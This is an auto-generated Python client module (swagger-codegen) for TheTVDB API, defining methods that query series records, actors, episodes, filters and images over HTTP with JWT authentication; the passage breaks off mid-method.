| 0
| 0
| 0
| 0.145455
| 110
| 4
| 28
| 27.5
| 0.87234
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
601066abad8001fab3800918885a958b07b2ee49
| 58,930
|
py
|
Python
|
tvdb_api/api/series_api.py
|
h3llrais3r/tvdbapi-v2-client
|
1210df9dd5869ccc5b63149b1b80630310a14f40
|
[
"MIT"
] | 2
|
2021-01-24T07:45:22.000Z
|
2021-11-15T11:29:25.000Z
|
tvdb_api/api/series_api.py
|
h3llrais3r/tvdb_api_v2
|
1210df9dd5869ccc5b63149b1b80630310a14f40
|
[
"MIT"
] | null | null | null |
tvdb_api/api/series_api.py
|
h3llrais3r/tvdb_api_v2
|
1210df9dd5869ccc5b63149b1b80630310a14f40
|
[
"MIT"
] | 1
|
2020-05-07T10:16:15.000Z
|
2020-05-07T10:16:15.000Z
|
# coding: utf-8
"""
TheTVDB API v2
API v3 targets v2 functionality with a few minor additions. The API is accessible via https://api.thetvdb.com and provides the following REST endpoints in JSON format. How to use this API documentation ---------------- You may browse the API routes without authentication, but if you wish to send requests to the API and see response data, then you must authenticate. 1. Obtain a JWT token by `POST`ing to the `/login` route in the `Authentication` section with your API key and credentials. 1. Paste the JWT token from the response into the \"JWT Token\" field at the top of the page and click the 'Add Token' button. You will now be able to use the remaining routes to send requests to the API and get a response. Language Selection ---------------- Language selection is done via the `Accept-Language` header. At the moment, you may only pass one language abbreviation in the header at a time. Valid language abbreviations can be found at the `/languages` route.. Authentication ---------------- Authentication to use the API is similar to the How-to section above. Users must `POST` to the `/login` route with their API key and credentials in the following format in order to obtain a JWT token. `{\"apikey\":\"APIKEY\",\"username\":\"USERNAME\",\"userkey\":\"USERKEY\"}` Note that the username and key are ONLY required for the `/user` routes. The user's key is labled `Account Identifier` in the account section of the main site. The token is then used in all subsequent requests by providing it in the `Authorization` header. The header will look like: `Authorization: Bearer <yourJWTtoken>`. Currently, the token expires after 24 hours. You can `GET` the `/refresh_token` route to extend that expiration date. Versioning ---------------- You may request a different version of the API by including an `Accept` header in your request with the following format: `Accept:application/vnd.thetvdb.v$VERSION`. This documentation automatically uses the version seen at the top and bottom of the page. # noqa: E501
OpenAPI spec version: 3.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tvdb_api.api_client import ApiClient
class SeriesApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def series_id_actors_get(self, id, **kwargs): # noqa: E501
"""series_id_actors_get # noqa: E501
Returns actors for the given series id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_actors_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:return: SeriesActors
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.series_id_actors_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.series_id_actors_get_with_http_info(id, **kwargs) # noqa: E501
return data
def series_id_actors_get_with_http_info(self, id, **kwargs): # noqa: E501
"""series_id_actors_get # noqa: E501
Returns actors for the given series id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_actors_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:return: SeriesActors
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method series_id_actors_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `series_id_actors_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jwtToken'] # noqa: E501
return self.api_client.call_api(
'/series/{id}/actors', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeriesActors', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def series_id_episodes_get(self, id, **kwargs): # noqa: E501
"""series_id_episodes_get # noqa: E501
All episodes for a given series. Paginated with 100 results per page. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_episodes_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str page: Page of results to fetch. Defaults to page 1 if not provided.
:return: SeriesEpisodes
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.series_id_episodes_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.series_id_episodes_get_with_http_info(id, **kwargs) # noqa: E501
return data
def series_id_episodes_get_with_http_info(self, id, **kwargs): # noqa: E501
"""series_id_episodes_get # noqa: E501
All episodes for a given series. Paginated with 100 results per page. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_episodes_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str page: Page of results to fetch. Defaults to page 1 if not provided.
:return: SeriesEpisodes
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'page'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method series_id_episodes_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `series_id_episodes_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jwtToken'] # noqa: E501
return self.api_client.call_api(
'/series/{id}/episodes', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeriesEpisodes', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def series_id_episodes_query_get(self, id, **kwargs): # noqa: E501
"""series_id_episodes_query_get # noqa: E501
This route allows the user to query against episodes for the given series. The response is a paginated array of episode records. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_episodes_query_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str absolute_number: Absolute number of the episode
:param str aired_season: Aired season number
:param str aired_episode: Aired episode number
:param str dvd_season: DVD season number
:param str dvd_episode: DVD episode number
:param str imdb_id: IMDB id of the series
:param str page: Page of results to fetch. Defaults to page 1 if not provided.
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: SeriesEpisodesQuery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.series_id_episodes_query_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.series_id_episodes_query_get_with_http_info(id, **kwargs) # noqa: E501
return data
def series_id_episodes_query_get_with_http_info(self, id, **kwargs): # noqa: E501
"""series_id_episodes_query_get # noqa: E501
This route allows the user to query against episodes for the given series. The response is a paginated array of episode records. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_episodes_query_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str absolute_number: Absolute number of the episode
:param str aired_season: Aired season number
:param str aired_episode: Aired episode number
:param str dvd_season: DVD season number
:param str dvd_episode: DVD episode number
:param str imdb_id: IMDB id of the series
:param str page: Page of results to fetch. Defaults to page 1 if not provided.
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: SeriesEpisodesQuery
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'absolute_number', 'aired_season', 'aired_episode', 'dvd_season', 'dvd_episode', 'imdb_id', 'page', 'accept_language'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method series_id_episodes_query_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `series_id_episodes_query_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'absolute_number' in params:
query_params.append(('absoluteNumber', params['absolute_number'])) # noqa: E501
if 'aired_season' in params:
query_params.append(('airedSeason', params['aired_season'])) # noqa: E501
if 'aired_episode' in params:
query_params.append(('airedEpisode', params['aired_episode'])) # noqa: E501
if 'dvd_season' in params:
query_params.append(('dvdSeason', params['dvd_season'])) # noqa: E501
if 'dvd_episode' in params:
query_params.append(('dvdEpisode', params['dvd_episode'])) # noqa: E501
if 'imdb_id' in params:
query_params.append(('imdbId', params['imdb_id'])) # noqa: E501
if 'page' in params:
query_params.append(('page', params['page'])) # noqa: E501
header_params = {}
if 'accept_language' in params:
header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jwtToken'] # noqa: E501
return self.api_client.call_api(
'/series/{id}/episodes/query', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeriesEpisodesQuery', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def series_id_episodes_query_params_get(self, id, **kwargs): # noqa: E501
"""series_id_episodes_query_params_get # noqa: E501
Returns the allowed query keys for the `/series/{id}/episodes/query` route # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_episodes_query_params_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:return: SeriesEpisodesQueryParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.series_id_episodes_query_params_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.series_id_episodes_query_params_get_with_http_info(id, **kwargs) # noqa: E501
return data
def series_id_episodes_query_params_get_with_http_info(self, id, **kwargs): # noqa: E501
"""series_id_episodes_query_params_get # noqa: E501
Returns the allowed query keys for the `/series/{id}/episodes/query` route # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_episodes_query_params_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:return: SeriesEpisodesQueryParams
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method series_id_episodes_query_params_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `series_id_episodes_query_params_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jwtToken'] # noqa: E501
return self.api_client.call_api(
'/series/{id}/episodes/query/params', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeriesEpisodesQueryParams', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def series_id_episodes_summary_get(self, id, **kwargs): # noqa: E501
"""series_id_episodes_summary_get # noqa: E501
Returns a summary of the episodes and seasons available for the series. __Note__: Season \"0\" is for all episodes that are considered to be specials. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_episodes_summary_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:return: SeriesEpisodesSummary
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.series_id_episodes_summary_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.series_id_episodes_summary_get_with_http_info(id, **kwargs) # noqa: E501
return data
def series_id_episodes_summary_get_with_http_info(self, id, **kwargs): # noqa: E501
"""series_id_episodes_summary_get # noqa: E501
Returns a summary of the episodes and seasons available for the series. __Note__: Season \"0\" is for all episodes that are considered to be specials. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_episodes_summary_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:return: SeriesEpisodesSummary
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method series_id_episodes_summary_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `series_id_episodes_summary_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jwtToken'] # noqa: E501
return self.api_client.call_api(
'/series/{id}/episodes/summary', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeriesEpisodesSummary', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def series_id_filter_get(self, id, keys, **kwargs): # noqa: E501
"""series_id_filter_get # noqa: E501
Returns a series records, filtered by the supplied comma-separated list of keys. Query keys can be found at the `/series/{id}/filter/params` route. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_filter_get(id, keys, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str keys: Comma-separated list of keys to filter by (required)
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: SeriesData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.series_id_filter_get_with_http_info(id, keys, **kwargs) # noqa: E501
else:
(data) = self.series_id_filter_get_with_http_info(id, keys, **kwargs) # noqa: E501
return data
def series_id_filter_get_with_http_info(self, id, keys, **kwargs): # noqa: E501
"""series_id_filter_get # noqa: E501
Returns a series records, filtered by the supplied comma-separated list of keys. Query keys can be found at the `/series/{id}/filter/params` route. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_filter_get_with_http_info(id, keys, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str keys: Comma-separated list of keys to filter by (required)
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: SeriesData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'keys', 'accept_language'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method series_id_filter_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `series_id_filter_get`") # noqa: E501
# verify the required parameter 'keys' is set
if ('keys' not in params or
params['keys'] is None):
raise ValueError("Missing the required parameter `keys` when calling `series_id_filter_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
if 'keys' in params:
query_params.append(('keys', params['keys'])) # noqa: E501
header_params = {}
if 'accept_language' in params:
header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jwtToken'] # noqa: E501
return self.api_client.call_api(
'/series/{id}/filter', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeriesData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def series_id_filter_params_get(self, id, **kwargs): # noqa: E501
"""series_id_filter_params_get # noqa: E501
Returns the list of keys available for the `/series/{id}/filter` route # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_filter_params_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: FilterKeys
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.series_id_filter_params_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.series_id_filter_params_get_with_http_info(id, **kwargs) # noqa: E501
return data
def series_id_filter_params_get_with_http_info(self, id, **kwargs): # noqa: E501
"""series_id_filter_params_get # noqa: E501
Returns the list of keys available for the `/series/{id}/filter` route # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_filter_params_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: FilterKeys
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'accept_language'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method series_id_filter_params_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `series_id_filter_params_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'accept_language' in params:
header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jwtToken'] # noqa: E501
return self.api_client.call_api(
'/series/{id}/filter/params', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FilterKeys', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def series_id_get(self, id, **kwargs): # noqa: E501
"""series_id_get # noqa: E501
Returns a series records that contains all information known about a particular series id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: SeriesData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.series_id_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.series_id_get_with_http_info(id, **kwargs) # noqa: E501
return data
def series_id_get_with_http_info(self, id, **kwargs): # noqa: E501
"""series_id_get # noqa: E501
Returns a series records that contains all information known about a particular series id. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: SeriesData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'accept_language'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method series_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `series_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'accept_language' in params:
header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jwtToken'] # noqa: E501
return self.api_client.call_api(
'/series/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SeriesData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def series_id_head(self, id, **kwargs): # noqa: E501
"""series_id_head # noqa: E501
Returns header information only about the given series ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_head(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.series_id_head_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.series_id_head_with_http_info(id, **kwargs) # noqa: E501
return data
def series_id_head_with_http_info(self, id, **kwargs): # noqa: E501
"""series_id_head # noqa: E501
Returns header information only about the given series ID. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_head_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'accept_language'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method series_id_head" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `series_id_head`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
if 'accept_language' in params:
header_params['Accept-Language'] = params['accept_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['jwtToken'] # noqa: E501
return self.api_client.call_api(
'/series/{id}', 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def series_id_images_get(self, id, **kwargs): # noqa: E501
"""series_id_images_get # noqa: E501
Returns a summary of the images for a particular series # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_images_get(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: SeriesImagesCounts
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.series_id_images_get_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.series_id_images_get_with_http_info(id, **kwargs) # noqa: E501
return data
def series_id_images_get_with_http_info(self, id, **kwargs): # noqa: E501
"""series_id_images_get # noqa: E501
Returns a summary of the images for a particular series # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.series_id_images_get_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int id: ID of the series (required)
:param str accept_language: Records are returned with the some fields in the desired language, if it exists. If there is no translation for the given language, then the record is still returned but with empty values for the translated fields.
:return: SeriesImagesCounts
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'accept_language'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
